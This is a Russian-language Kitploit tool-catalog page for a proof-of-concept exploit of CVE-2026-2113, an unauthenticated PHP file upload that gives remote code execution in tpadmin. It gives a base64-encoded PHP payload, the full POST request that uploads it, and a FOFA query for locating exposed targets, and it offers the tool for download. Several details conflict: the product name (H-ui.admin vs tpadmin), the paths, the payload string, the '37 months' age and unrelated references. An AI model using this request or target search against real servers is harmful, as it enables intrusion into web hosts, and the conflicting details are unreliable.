Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
tpadmin-CVE-2026-2113-poc — Уязвимость удалённого выполнения кода, позволяющая неаутентифицированным злоумышленникам загружать произвольные PHP-файлы напрямую на веб-сервер. Это приводит к немедленному удалённому выполнению кода с привилегиями веб-сервера. | Kitploit
Инструменты/GitHubGitHub/maxmnml/tpadmin-cve-2026-2113-poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubmaxmnml/tpadmin-cve-2026-2113-poc

tpadmin-CVE-2026-2113-poc

Уязвимость удалённого выполнения кода, позволяющая неаутентифицированным злоумышленникам загружать произвольные PHP-файлы напрямую на веб-сервер. Это приводит к немедленному удалённому выполнению кода с привилегиями веб-сервера.

Репозиторий
37 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

tpadmin-CVE-2026-2113-poc

Доказательство концепции эксплуатации удалённого выполнения кода с привилегиями веб-сервера через произвольную загрузку файлов.

Описание уязвимости

Критическая уязвимость удалённого выполнения кода существует в компоненте предварительного просмотра WebUploader системы H-ui.admin. Файл /public/static/admin/lib/webuploader/0.1.5/server/preview.php не имеет надлежащей аутентификации и проверки файлов, что позволяет неавторизованным злоумышленникам загружать произвольные PHP-файлы напрямую на веб-сервер. Это приводит к немедленному удалённому выполнению кода с привилегиями веб-сервера.

Затронутые версии

  • tpadmin до версии 1.3.12

Poc (by sTy1H)

  1. Создайте полезную нагрузку (закодируйте опасное выражение в base64)
printf "<? php phpinfo();?>" | base64
PD9waHAgcGhwaW5mbygpOz8+
  1. Сформируйте POST-запрос с нашей полезной нагрузкой
POST /admin/lib/webuploader/0.1.5/server/preview.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=6mqs895r9r0k9ci9jj0hms506n
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 46

data:image/php;base64,PD9waHAgcGhwaW5mbygpOz8+
  1. Перейдите по полученному URL
изображение

В дикой природе

FOFA:

title='Tpadmin'

Воздействие

Неавторизованный удалённый злоумышленник может использовать произвольную загрузку файлов для получения RCE с привилегиями веб-сервера.

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P - 6.9:Medium

Устранение и смягчение последствий

Данных о возможных мерах противодействия нет. Рекомендуется заменить затронутый компонент альтернативным продуктом.

Ссылки

  • https://github.com/yuan1994/tpAdmin
  • https://www.smartertools.com/smartermail/release-notes/current)
  • https://nvd.nist.gov/vuln/detail/CVE-2026-23760

Отказ от ответственности

Этот инструмент предназначен только для авторизованного тестирования безопасности. Несанкционированный доступ к компьютерным системам противозаконен.

Скачать инструмент